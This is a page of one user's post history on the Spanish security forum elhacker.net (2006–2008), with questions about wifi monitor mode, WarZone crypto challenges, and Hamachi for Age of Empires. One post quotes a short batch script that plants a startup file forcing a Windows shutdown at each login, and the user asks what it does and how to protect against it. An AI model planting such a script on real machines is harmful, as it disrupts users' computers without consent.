elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Como proteger una cartera - billetera de Bitcoin


  Mostrar Mensajes
Páginas: 1 2 3 4 [5] 6
41  Seguridad Informática / Materiales y equipos / d-link dwl 520+ alguien la a probado en: 7 Abril 2008, 04:01 am
hola alguien sabe si esta tarjeta se puede poner en modo monitor con windows y si inyecta trafico es que la he buscado por el post de que tarjeta elegir y no la encuentro
42  Seguridad Informática / Materiales y equipos / gps pregunta (esto va aquy) en: 2 Abril 2008, 03:14 am
hola es que tengo una pregunta es que ley hace poco por hay en un manual que era posible hubicar redes wifi por un gps eso es posible  :huh:  :huh:
43  Seguridad Informática / WarZone / Re: Para los Guerreros de: WarZone ! en: 13 Enero 2008, 01:13 am
hola a todos es que estoy en la prueba de criptografia orden ya la desencripte pero no entiendo que es lo que hay que hacer con el mensaje no es muy claro lo introdusco todo y nada y lo coloco por partes y nada no entiendo una ayuda plz  :rolleyes: :rolleyes:
44  Seguridad Informática / WarZone / Re: Para los Guerreros de: WarZone ! en: 5 Enero 2008, 03:04 am
hola a todos es que tengo un un problema cuando doy la respuesta en la de criptografia basica no aparece nada por que se ya desencripte lo que pedian no entiendo hay que hacer algo mas o toca escribirlo sin espacios plz una ayuda..... :huh:  :huh:  :huh:  :huh:  :huh:
45  Programación / Scripting / Re: que es esto??? en: 17 Diciembre 2006, 02:59 am
mmmmm interesante ;D

men y si quisiera aprender a crear esta clase de script que lenguaje de programacion me recomienda es que soy algo nuevo en esto de del hack y seguridad  informatica......????


solo con fines netamente educativos  :-X
46  Programación / Scripting / Re: que es esto??? en: 10 Diciembre 2006, 19:17 pm
men se puede esto se puede considerar como un virus ????

ahora si yo quisiera protegerme contra esto suponoiendo que lo ejecute sin querer como le hago
47  Programación / Scripting / que es esto??? en: 10 Diciembre 2006, 02:00 am
bueno me he conseguido esto por hay y aun no lo entiendo muy bien alguien me explica que es y como funciona

@echo off
c:
cd\
cd documents*\*users*\*Inicio*\Programas\Inicio\
echo echo off >> elquereinicia.bat
echo shutdown -s -t 30 >> elquereinicia.bat
echo exit >> elquereinicia.bat
exit


age of empires the conquerors
48  Media / Juegos y Consolas / Re: Hamachi y age of empires en: 9 Abril 2006, 23:13 pm
hayy loco no me ridiculise si  :huh: un error lo puede cometer cualquiera no se crea perfecto
49  Media / Juegos y Consolas / Re: Hamachi y age of empires en: 7 Abril 2006, 23:18 pm
aver te explico de lo que yo he entendido mira cuando te conectas atravez de un moden te asignan una ip si solo es tu computador conectado a esa red pues tu ip en ejemplo ba a ser 200.156.210.84 cierto bueno cuando te conecta a internet por una lan el esquema   servidor--------> pc1----->pc2 si tu eres el servidor pues ningun problema pero si tu eres pc1 pues te jodiste porque no ba a opeder jugar con alguien conectador a internet fuera de su red por que tu ip es publica (192.168.0.1) cierto hay es donde interbiene hamachi y es que es te programa te conecta cualquier red con la tuya y te gruga una ip  5.7.70.73 ejmplo
50  Media / Juegos y Consolas / Re: Hamachi y age of empires en: 5 Abril 2006, 21:58 pm
hay les dejo mi red para jugar age of empires 2

usuar: a-g-e--o-f
pass: 12345
Páginas: 1 2 3 4 [5] 6
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines